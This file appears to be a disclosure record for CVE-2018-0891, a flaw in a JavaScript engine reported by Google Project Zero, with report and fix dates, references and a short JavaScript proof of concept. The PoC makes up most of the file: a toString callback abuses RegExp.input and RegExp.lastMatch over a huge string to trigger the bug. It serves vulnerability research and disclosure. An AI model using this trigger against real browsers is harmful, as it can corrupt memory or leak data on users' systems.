CVE-2018-0891.md

CVE-2018-0891

• Report: Dec 2017
• Fix: Mar 2018
• Credit: ifratric of Google Project Zero

PoC

function main() {
  RegExp.input = {toString: f};
  alert(RegExp.lastMatch);
}

var input = [Array(10000000).join("a"), Array(11).join("b"), Array(100).join("a")].join("");

function f() {
  String.prototype.match.call(input, "bbbbbbbbbb");
}

main();

Reference

• Microsoft
• Google Project Zero